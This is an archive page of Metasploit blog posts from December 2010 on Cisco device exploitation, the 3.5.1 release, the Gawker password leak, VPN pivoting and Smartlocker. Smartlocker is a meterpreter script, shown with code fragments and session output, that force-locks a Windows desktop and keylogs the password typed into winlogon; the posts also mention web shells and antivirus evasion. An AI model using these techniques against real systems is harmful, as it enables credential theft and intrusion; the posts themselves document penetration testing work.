Skip navigation
All Places > Metasploit > Blog > 2010 > December
2010

Originally Posted by HD Moore

 

 

The Metasploit Framework and the commercial Metasploit products have always provided features for assessing the security of network devices. With the latest release, we took this a step further and focused on accelerating the penetration testing process for Cisco IOS devices. While the individual modules and supporting libraries were added to the open source framework, the commercial products can now chain these modules together to quickly compromise all vulnerable devices on the network. The screen shot below gives you an idea of what a successful penetration test can look like:  

cisco_pro_012.png

 

 

 

 

To begin with, I should state that a properly configured Cisco device is a tough target to crack. Vulnerabilities exist in IOS, just like any other piece of software, but only a few folks have managed to leverage memory corruption flaws into code execution. For this reason, the majority of real-world attacks against IOS devices tend to focus on two areas: poor configuration and weak passwords. 

Before we dive into the specifics, lets review the current "state of the art" in Cisco IOS security testing.  Vulnerability scanners do a great job of identifying out of date IOS installations by comparing version strings. This works well for determining whether  a device is patched, but doesn't help a penetration tester who doesn't have a deep background in IOS exploitation. With few exceptions, this leaves a small number of services that are commonly exposed in production environments. These services include SNMP, Telnet, SSH, and HTTP. You may also find Finger running or relay services for media protocols like SIP and H.323. For remote access, the first four are what most of us have to work with, and even then, its rare to find a properly configured router with any of those services exposed to the network at large. 

The Cisco IOS HTTP service has a few well-known vulnerabilities on older versions of the operating system. The two we care about as penetration testers both relate to authentication bypass. The first flaw,
CVE-2000-0945, relates to missing authentication in the IOS Device Manager interface. This vulnerability allows unauthenticated, often privileged access to the IOS installation through the web interface. The second vulnerability, CVE-02001-0537, allows an attacker to bypass authentication by specifying an authentication level higher than "15" in the request to the HTTP service. This also provides privileged access to the device through the web interface. The open source Metasploit Framework now provides two modules for exploiting these vulnerabilities: 

1.
/auxiliary/scanner/http/cisco_device_manager2. /auxiliary/scanner/http/cisco_ios_auth_bypass

 

Metasploit Express and Metasploit Pro will automatically recognize Cisco IOS HTTP services during a discovery scan, check for these two flaws, and exploit them to gain access to the running device configuration. 

In addition to these two known vulnerabilities, the device password can also be determined through a brute force attack on the HTTP service. The HTTP protocol is relatively quick to brute force, compared to slower,  terminal-based services like Telnet and SSH.  Metasploit Express and Metasploit Pro will automatically grab the running device configuration after a successful HTTP brute force of an IOS device. 

The next service I want to discuss is SNMP. Oddly enough, SNMP is often left exposed on otherwise secure routers. The reason for this may be the general view of what SNMP is and does. The Simple Network Management Protocol is great for polling information across a wide range of systems in a standard format. Regardless of who built your switch or router, just about any SNMP client and monitoring software will work with that device, provided SNMP is enabled and configured. 

What many network administrators don't realize, is not only the depth of information exposed by SNMP but the fact that a writeable SNMP community can be leveraged to gain complete control over a device.  In the case of Cisco IOS, a writeable SNMP community can be used to download the running device configuration AND modify the running configuration. A router with telnet disabled and a complex serial password can be hijacked nearly instantly through a writeable SNMP community.  The Metasploit Framework provides a
SNMP brute force tool, written as an auxiliary module, which can leverage a wordlist of common passwords to identify valid communities and determine whether they are read-only or read-write.  In addition to the basic brute force module, Metasploit now contains a module (submitted by community contributor "pello"), that can use a writeable SNMP community to download the running device configuration. 

Metasploit Express and Metasploit Pro use these two modules to automatically grab the configuration files of vulnerable devices. During a discovery scan, the SNMP brute force tool is launched in the background with a small wordlist of common communities. If any of these passwords work and the community is detected as writeable, the product will configure a local TFTP service and download the running configuration file.  Since the SNMP protocol is now integrated into the intelligent brute force component of the product, the same now applies to communities guessed during a brute force run. The brute force component uses a highly tuned list of communities in addition to the dynamically generated passwords for that project. This tuned list is derived from a research project that involved scraping web forms for pasted configuration files, extracting and brute forcing the embedded passwords, and then analyzing the results to determine what passwords are most commonly used, including SNMP communities.  The results of this project were surprising, I would never have  guessed that "public@es0" and "private@es0" were widely used due to an example configuration included in the
Cisco documentation

 

.  The last two protocols I want to discuss are Telnet and SSH. These protocols both provide access to a remote command shell on the target device, usually as non-privileged user. The most notable difference from penetration testing perspective, is that SSH often requires knowledge of a remote username and password, where Telnet is often configured with password-only authentication.  The Metasploit Framework contains modules for brute forcing both of these protocols and will automatically create an interactive session when the brute force process succeeds. 

Metasploit Express and Metasploit Pro have always supported attacks against network devices using the Telnet and SSH protocols, but with the latest release, now leverage the tuned password list from our password analytics research. This results in some unusual passwords floating to the top of the wordlist, but is extremely effective against real-world configurations. Without giving too much away, I can say that some ISPs are notorious for using static passwords to configure customer-owned equipment. 

After a session has been established through the Telnet or SSH protocols on a Cisco IOS device, the Evidence Collection feature in the commercial products will automatically grab the version information, active user list, and attempt to brute force the enable password with a list of common passwords. If the collection script is able to gain enable access, it will automatically dump additional information from the system, including the running configuration. 

The attacks listed above are not anything new. What is new is the ease that they can be carried out using Metasploit and the ability of the commercial products to chain them together to automatically compromise vulnerable devices. These attacks are just an extension of our existing coverage and a hint of what  is on the roadmap for future development of our commercial products. 

One thing I haven't mentioned so far is what we actually do with the Cisco IOS configuration files after we capture them. These files contain the running configuration of the device, this includes the vty passwords, enable passwords, VPN keys, SSL certifications, and WiFi credentials. Metaspoit will automatically parse these configuration files to scrape out sensitive data and store it as either evidence of a compromise or as stolen authentication credentials. The screen shot below demonstrates the output of brute forcing the Telnet vty password, then the enable password, then dumping and parsing the configuration:  

cisco_pro_02.png

 

Metasploit Express and Metasploit Pro can automatically recycle credentials obtained from these configuration files to gain access to other devices on the network. If you crack one Cisco device through a weak SNMP community and discover that the vty password is "ciscorules!", you can use the "known-only" profile of the brute force component to automatically try this password, via any protocol, against any other device on the network. Once you gain access to other devices, the configuration files are obtained  and the entire process starts again. You can easily apply a password taken from a Cisco router against the login page of an intranet site or leverage a password obtained through a traditional exploit to gain access to a multitude of network devices.  One of our development goals is  to ensure that our users can always identify and exploit the weakest link on a given network. 

That's it for this post,  please give the new features a whirl and let us know via comments if you have any questions or suggestions for improvements.

-HD

Originally Posted by Matt Barrett

 

 

This week the guys over at Offensive Security officially added Metasploit Pro to their curriculum for the class Pentration Testing with Backtrack. For those not familiar with it, BackTrack is a Linux distribution that includes a lot of tools for penetration testing. Since 2006, it has been downloaded three million times and has become the most widely used collection of penetration testing tools. BackTrack is funded by Offensive Security who, in turn, teach people how to use it.

Penetration Testing with BackTrack (PWB) is a phenomenal course that is well respected in corporate and open source circles alike. The fact that Metasploit Pro is now included in the course is excellent - and it makes sense. Feedback from industry experts on VPN pivoting in Metasploit Pro has been fantastic (check out this
VPN pivoting introduction and this VPN pivoting how-to) but the question that keeps coming up is: What can I do once I have set up a VPN pivot?

snapshot2-1024x640.png
          Penetration testers using Metasploit Pro can now route all BackTrack
           Linux tools through a compromised target using VPN pivoting

  Installing Metasploit Pro on BackTrack answers that question ten-fold. BackTrack has a ridiculous amount of reconnaissance, analysis and attack tools for you to choose from. In addition to running Metasploit Pro, how about some packet analysis with Wireshark? Maybe a nice man-in-the-middle attack to intercept PII (personally identifiable information) with Ettercap? How about we find a vulnerable wireless access point and clone it to grab everything from everybody using Karmetasploit (also an HD Moore project)? Using Metasploit Pro's VPN pivoting, you can tunnel all of these tools through a pwned host.   

There are over 300 different tools that ship with BackTrack for every type of penetration testing work imaginable. Once you open the door with Metasploit Pro, the sky is the limit. You can find the Offensive Security blogpost
here. An excerpt:

 

 

 

 

"On a more personal note, like many people, I was a little uncertain when  hearing about the acquisition of Metasploit by Rapid7 but they have demonstrated that they are dedicatedto keeping the open-source version of Metasploit alive and well and Metasploit Pro is clearly an excellent product. From the ability to import multiple external file formats to the VPN pivoting to thewide range of reporting options, Metasploit Pro will be a great timesaver for those who choose to use it as their penetration testing tool of choice."

 

A big thank-you shout out to our friends at Offensive Security!

Originally Posted by Chris Kirsch

 

 

Secret passwords don’t only get you into Aladdin’s cave or the tree house, but also into corporate networks and bank accounts. Yet, they are one of the weakest ways to protect access. Sure, there are better ways to secure access, such as smart cards or one-time password tokens, but these are still far from being deployed everywhere although the technology has matured considerably over the past years. Passwords are still the easiest way into a network. 

The new Metasploit version 3.5.1 adds a lot of features to audit your network’s password security on many levels. Metasploit has always offered a broad range of brute forcing capabilities. Since version 3.5.1, it now also downloads the configuration files of Cisco routers and extracts their passwords. HD’s team has also added brute forcing of UNIX “r” services, such as rshell, rlogin and rexec, as well as VNC and SNMP services. Metasploit can also now import pcap network traffic logs to find clear text passwords, and to discover hosts and services. 

Metasploit has also become stealthier than ever: It now flies under the radar of intrusion detection (IDS) and intrusion prevention systems (IPS). An enhanced anti-virus evasion ensures that exploits are not stopped by end-point defenses. 

And for those of you enjoying a good cup of coffee while well-meaning end users do your job, we’ve added email attachments to social engineering campaigns that enable you to send out malicious PDF and MP3 files. 

Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. 

The new Metasploit version 3.5.1 is available for both the free, open source Metasploit Framework and the commercial editions Metasploit Express and Metasploit Pro. Here is an overview of the new features: 

Overview of the features added in version 3.5.1:

 

 

FeatureMetasploit
Framework
Metasploit
Express
Metasploit
Pro
Network security
Comprehensive Cisco device exploitation
XX
Additional network device audit and exploitationXXX
Discovery
Enhanced performance for port scans and host discovery
XX
Network traffic analysis using pcap packet capturesXXX
Brute forcing
Brute force support for Unix “r” Services (rshell, rlogin, rexec)XXX
Brute force support for VNC desktop servicesXXX
Brute force support for SNMP (devices)XXX
Stealth
New IDS/IPS evasion options for automated exploitation
XX
Improved anti-virus evasion for executable templates

X
Social Engineering
File-format exploits now available for email campaigns (attach malicious PDF, MP3, etc)

X
Web application security
Import and validate results web application scanners
XX
Pivoting
VPN pivoting for Metasploit on Windows

X
Administration
Network boundaries for project members

X

 

 

 

If you haven’t tried Metasploit Pro yet, get your free, fully featured Metasploit Pro trial.

Originally Posted by egypt

 

 

Rapid7 and the Metasploit Project are proud to announce version 3.5.1 of the Metasploit Framework!  This minor version release adds 47 new modules, including exploit covereage for recent bugs in the news: Exim4, Internet Explorer, and ProFTPd.  Java payloads have seen significant improvement and java_signed_applet can now use them for complete cross-platform no-exploit-required pwnage.  Eight new meterpreter scripts were added, including smartlocker and schelevator, an exploit for the 0-day privilege escalation used by stuxnet.  Meterpreter itself now has support for remotely turning on and recording from webcams and microphones, completely in memory.  You can now export stolen hashes in John the Ripper and pwdump formats, facilitating cracking with standard tools.  PCAP support has been added to db_import allowing you to pull in hosts and services without sending a single packet.

 

Development continues at break-neck speed with around 45 tickets closed since the last release.  This graph, from ohloh.net, summarizes the framework's increased pace quite well.

 

msf-vs-rails.png

 

For this release, we've added a Linux installer that bundles Java and PostgreSQL.  Now you can run msfgui and use a database connection out of the box with zero configuration on Linux and Windows.  The new installers use a gui to ask you where to install, so for headless installations you can run them with "--mode text" to keep everything in a shell, or just accept all of the defaults with "--mode unattended".

 

For more details, see the full 3.5.1 release notes.  As always, the latest version is available from the Metasploit download page.

Semipublic Password Dumps

Posted by rapid7-admin Dec 13, 2010

Originally Posted by todb

 

 

I woke up this morning to find reddits abuzz with the latest password dump, this time from Gawker and related properties. The splashy headline is usually something around "1.3 million Gawker passwords leaked." I wanted to write a couple words here since the areas of credential management, password complexity, and attack mitigation are all near and dear to my heart.

 

Firstly, the "1.3 million passwords" figure is a little bit of a misnomer. There are a bunch of files floating around the torrent sites, one of which is, indeed, a "full" database dump of usernames, encrypted passwords, and e-mail addresses. That file is 1,247,894 lines. Trouble is, the raw data isn't normalized at all, and so there are actually right around a half million e-mail addresses, and something close to ~200k complete username + password + e-mail address credentials. That all said, the data most people are actually looking at today is 188,281 credentials strong, which is the pre-cracked list of credentials distributed with the drop (one exception are the guys at Duo Security, who are cracking the DES-encrypted passwords independently).

 

Secondly, these passwords, in the main, are not very high value, which is assuredly one reason why they were released. In very modern jurisdictions like California and the EU, the leak of e-mail addresses is much more serious. These passwords are just not that big of a deal, since they're used for by people to comment on celebrity gossip, so these kinds of throwaway credentials are pretty common for public blogs.

 

This reminds me of something that a pen-test friend once said -- while "password" and "123456" are pretty common tokens on the Internet -- just look at the SkullSecurity lists. However, you find them a whole lot less on intranets, since your company's administrator is probably enforcing some kind of complexity and rotation policy. For internal networks, you find dates and days of the week a lot more often as passwords, since something like "Dec-13-2010" meets most complexity requirements and is really easy to rotate on a schedule.

 

Of course, some of these are (were) legit passwords that will (did) work against Twitter, Facebook, and e-mail accounts with the same username, but I wouldn't get all apoplectic over them. Rest assured, of the passwords that also work (worked) for e-mail addresses have almost certainly already been compromised. Two hundred thousand credentials is not all that hard to churn through with even college-kid resources.

 

Finally, the password dump itself is, while headline-grabbing, less interesting to incident response and computer forensics dorks than the clues in the collateral files as to how the attackers got access in the first place. It looks like it's a pretty typical PHP attack vector, and, as Egyp7 once quipped, "PHP is a virtual machine for shellcode." Clearly, some level of source code security auditing would have gone a long way to help Gawker avoid these headlines today. In addition, there's the whole secondary story that the attackers also gained access to Gawker's content management system (CMS). This is a huge deal -- like most purely online businesses, Gawker takes their code's secrecy pretty seriously.

 

At any rate, public dumps of actual passwords like these are always interesting from a research perspective -- it's nice to have the opportunity to check in on the current state of throwaway accounts. While this all sucks for Gawker, the security community benefits from large-ish datasets like this, since papers get written and there are renewed pushes for proper encryption of stored passwords and passwordless authentication schemes. Hopefully, the overall security posture of the Internet ends up improved.

Originally Posted by CG

 

 

Oftentimes during a penetration test engagement, a bit of finesse goes a long way. One of the most effective ways to capture the clear-text user password from a compromised Windows machine is through the "keylogrecorder" Meterpreter script. This script can migrate into the winlogon.exe process, start capturing keystrokes, and then lock the user's desktop (the -k option). When the user enters their password to unlock their desktop, you now have their password. This, while funny and effective, can raise undue suspicion, especially when conducted across multiple systems at the same time. A smarter approach is to wait for a predetermined amount of idle time before locking the screen.

 

Enter Smartlocker. Smartlocker is a Meterpreter script written by CG and mubix that is similar to keylogrecorder (some code was even copied directly from it, thank you Carlos). But, unlike keylogrecorder, Smartlocker is designed to use a lighter touch when it comes to obtaining the user's password. Unlike keylogrecorder, Smartlocker is solely focused on obtaining passwords from winlogon.exe. Since winlogon only sees the keystrokes that happen when a login occurs, the resulting log file only contains the username and password. Perfect, right?

 

Smartlocker addressed three shortcomings with using keylogrecorder to capture login credentials.

 

 

1. If there are two winlogon processes on the machine, keylogrecorder will migrate into one, and then the other, many times rendering your meterpreter session dead or otherwise unusable.  While this is a corner case, I have come across it during penetration tests, and its something that will be addressed in an upcoming fix to keylogrecorder. The other problem when there are two winlogon processes is that you can’t be sure which process you need to be in to be capture the active user's password.

 

2. The user is locked out instantly if the "-k" option is selected. While 80% of the target users may barely flinch at this, it will certainly stand out as odd behavior. This behavior will be even more suspicious if the user just opened an attachment or browsed to something they shouldn't have.  That extra bit of "weirdness" may push them to make that help desk call...not good.

 

3. You have to jump through hoops to identify when the user has logged back in. One way to do this is through screen captures, but this is a manual and time intensive process. Idle time is also an imperfect marker as a user might have pushed the mouse by accident.

 

 

Smartlocker does it’s best to solve these issues.

 

Fade to cube farm...

 

John Doe is a graphic designer for ACME Co. He just clicked your link and was kind enough to give you a reverse Meterpreter session. You’ve looked around John’s system and found nothing of interest except for learning that John is a SharePoint admin on the local MS SharePoint server. SMB isn’t working, so you decide to go after SharePoint itself and you need John’s actual password for this task. But John is smart (or thought he was before he still clicked your link), his password is 25 characters, making it difficult to crack from dumping the MS Cache hash value.

 

Smartlocker’s options:

 


Usage:
OPTIONS:

-b   Heartbeat time between idle checks. Default is 30 seconds.
-h   Help menu.
-i   Idletime to wait before locking the screen automatically. Default 300 seconds (5 minutes).
-p   Target PID - used when multiple Winlogon sessions are present.
-t   Time interval in seconds between recollection of keystrokes, default 30 seconds.

 


A quick check to see if John’s computer is set to lock out automatically:

 


meterpreter > getuid
Server username: ACME\johnd

meterpreter > reg queryval -k "HKCU\\Control Panel\\Desktop" -v ScreenSaverIsSecure

Key: HKCU\Control Panel\Desktop

Name: ScreenSaverIsSecure

Type: REG_SZ

Data: 0

 

And it isn’t, so we’ll be going with Smartlocker’s default setting, which is a time based approach. The script checks to see if the target user account is an administrator and if so, finds all the winlogon processes running on John’s box. Since there is only one, Smartlocker automatically migrates to it and starts listening for keystrokes.

 

The following code polls the idle time of John’s box every $heartbeat seconds until the actual idle time reaches the $idletime threshold and then force-locks John’s box:

 

currentidle = session.ui.idle_time
print_status("System has currently been idle for #{currentidle} seconds")

while currentidle <= idletime do         print_status("Current Idletime: #{currentidle} seconds")
sleep(heartbeat)         currentidle = session.ui.idle_time     end     client.railgun.user32.LockWorkStation()

 

This is where it basically just runs Carlos’ code and starts the keylogger, pulling the keystrokes out of memory every $heartbeat seconds. But, the cool part is, before it wraps back around to keep keylogging, it does a check to see if the user has logged back in. GetForegroundWindow is a Windows API call utilized through railgun which is process specific, and in winlogon’s case, it is only ever non-zero when the computer is locked or logged out. So a pretty simple IF statement stops the key logger automagically when it’s achieved its goal.

 


still_locked = client.railgun.user32.GetForegroundWindow()['return']   if still_locked == 0
print_status("They logged back in! Money time!")   raise 'win' end  sleep(keytime.to_i) end
rescue::Exception => e

if e.message != 'win'

print("\n")

print_status("#{e.class} #{e}")

end

print_status("Stopping keystroke sniffer...")

session.ui.keyscan_stop

 


Here is the script in action on John’s box, you can even see where the idle time went back down to 12 when John moved his mouse:

 

meterpreter > run smartlocker
[*] Found WINLOGON at PID:644

[*] Migrating from PID:2532

[*] Migrated to WINLOGON PID: 644 successfully

[*] System has currently been idle for 12 seconds

[*] Current Idletime: 12 seconds

[*] Current Idletime: 42 seconds

[*] Current Idletime: 73 seconds

[*] Current Idletime: 12 seconds

[*] Current Idletime: 42 seconds

[*] Current Idletime: 72 seconds

[*] Current Idletime: 103 seconds

[*] Current Idletime: 133 seconds

[*] Current Idletime: 164 seconds

[*] Current Idletime: 194 seconds

[*] Current Idletime: 224 seconds

[*] Current Idletime: 255 seconds

[*] Current Idletime: 285 seconds

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt

[*] Recording

[*] They logged back in! Money time!

[*] Stopping keystroke sniffer...

meterpreter > background

msf > cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt

[*] exec: cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.155_20101101.2157.txt

design4life$uper12#07#76!

 


Now, with John’s password we login to the SharePoint server, drop an ASP web shell, hook the local MS SQL database using the clear-text passwords found on the box and get a Meterpreter binary going on the SharePoint server [1].

 

[1] http://www.room362.com/blog/2010/5/7/0exploit-privilege-escalation.html

 

Now we run Smartlocker again and this time it identifies multiple instances of winlogon running, most likely because someone is using Remote Desktop to access this system. One thing to note, for the session ID for each winlogon instance, 0 is always the base console and any other number is some sort of remote login. Session ID is not something you’ll get from Meterpreter’s "ps" command so take note of which PID you are going to target.

 

Quick note: Any windows system that is configured to only allow one active ‘session’ such as XP, Vista and Windows 7 actually records the login keystrokes on Session 0 even though it creates a new winlogon instance, where as systems with terminal services, like 2k,2k3,2k8, the keystrokes are processed by each winlogon process respectively to their session.

 


meterpreter > run smartlocker
[-] Multiple WINLOGON processes found, run manually and specify pid

[-] Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session

[*] Winlogon.exe - PID: 892 - Session: 0

[*] Winlogon.exe - PID: 415 - Session: 3

 


Using the "-p" option with "415" as the PID of the winlogon instance we are targeting (since it’s a Windows 2008 server), we run Smartlocker again, and use the ‘-w’ option to simply wait for the user / admin to lock out their session instead of locking it for them.

 


meterpreter > run smartlocker -p 415 -w
[*] WINLOGON PID:415 specified. I'm trusting you..

[*] Migrating from PID:1788

[*] Migrated to WINLOGON PID: 415 successfully

[*] Waiting for user to lock their session out

[*] Session has been locked out

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt

[*] Recording

[*] They logged back in! Money time!

[*] Stopping keystroke sniffer...

meterpreter > background

msf > cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt

[*] exec: cat /home/user/.msf3/logs/scripts/smartlocker/10.0.0.150_20101101.5433.txt

M@sterD0mainAdm!n221

msf >

 


Bingo! Domain Admin. Not just that, but their clear-text password.

Originally Posted by Matt Barrett

 

 

Penetration testing software only shows its true capabilities on actual engagements. However, you cannot race a car before you've ever sat in the driver's seat. That’s why in this article I’d like to show you how to set up a test environment for VPN pivoting, a Metasploit Pro feature for intermediate and advanced users recently described in this post.

 

 

VPN Pivoting is one of the best but also most elusive features in Metasploit Pro. It enables users to route traffic through an exploited host to a different network. A TUN/TAP adaptor activates on the Metasploit Pro machine, showing no trace of a new network adapter on the exploited host. 

How does it work? VPN pivoting installs hooks at the kernel level of the target system without making any permanent or persistent change to the OS. In layman's terms, it gives the Metasploit Pro machine an IP address on the network of the exploited host. The use case is pretty cool, but we'll get into that later. 

You will need:

 

  • A copy of Metasploit Pro (download trial version if you don’t have a license)
  • Some form of virtualization technology (I use VMware Workstation)
  • Two or more vulnerable VMs (at least one Windows because VPN pivoting currently only works on a Windows target)
  • A can-do attitude

 

Pivoting enables you to jump from one network segment to another. This requires that one target machine has two network adapters, constituting a bridge between the network segments for you to exploit. In my example, I’m using three virtual machines:

 

  • Metasploit Pro machine (external network)
  • Windows Server 2003 (two network cards, one internal IP, one external IP )
  • Windows XP (internal network )

 

 

We want to simulate an external penetration test where we exploit the Windows Server 2003 and then pivot into the internal network to exploit the Windows XP machine. If you can get a session on this machine, you can pivot to gain access to the private network. To simulate this we need one device that has both a public and private IP, and one device that just has a private IP. 

I find it easiest to use VMware’s Virtual Network Editor in the Edit menu to configure the VMnet adapters.  You can add up to 8 network interfaces in VMware Workstation, but we’ll only need 2. I chose VMNet1 and VMNet2. If you already have those reserved for something else, just substitute some of the additional adaptors for this use case. Set up the Metasploit Pro machine on vmnet1:

 

Virtual network adapterVmnet1 (external network)
Host-only (connect VMs internally in a private network)Yes
Connect a host virtual adapter to this networkNo
Use local DHCP service to distribute IP addresses to VMsYes
Subnet IP192.168.187.0
Subnet mask255.255.255.0

 

Windows Server 2003 networking as follows:

 

Virtual network adapterVmnet1 (external network)Vmnet2 (internal network)
Host-only (connect VMs internally in a private network)YesYes
Connect a host virtual adapter to this networkYesNo
Use local DHCP service to distribute IP addresses to VMsYesYes
Subnet192.168.187.0172.16.255.0
Subnet mask255.255.255.0255.255.255.0

 

Setting up the Windows XP machine is much easier because it only needs one network adapter (vnmnet2):

 

Virtual network adapterVmnet2 (internal network)
Host-only (connect VMs internally in a private network)Yes
Connect a host virtual adapter to this networkNo
Use local DHCP service to distribute IP addresses to VMsYes
Subnet IP172.16.255.0
Subnet mask255.255.255.0

 

Once completed, your setup should look like this:


 

Now that we’ve done the heavy lifting, it’s time to have some fun:


  1. Use Metasploit Pro to discover the Windows Server 2003 machine’s external IP address.
  2. Exploit the host to get a session.
  3. Click on Create VPN Pivot from Sessions dialog. This option is only enabled if the shelled machine has a second IP address in a network segment that’s not directly accessible by Metasploit Pro.
  4. Choose the 172.16.255.x network. (VMware's local DHCP service should automatically give you an IP address, if not just specify one manually).

  5. At this point, the layer 2 traffic from the Metasploit Pro machine is routed into the internal network. It’s very much like you just connected to the target’s corporate VPN, hence the name VPN pivoting.  Unlike other, proxy-based pivoting technologies, Metasploit Pro doesn’t have any networking limitations, so you could also use a vulnerability scanner, such as NeXpose, to carry out an advanced discovery.

  6. Run another discovery specifying the 172.16.255.0/24 network.
  7. Have your face melt when you see that the Windows XP machine appears in your hosts list! Huzzah!

 

Take some time to browse around the Windows 2003 server – you won’t find a trace of the pivot. Essentially, you are now performing an internal penetration test from the outside. Pretty incredible, right?

Filter Blog

By date: By tag: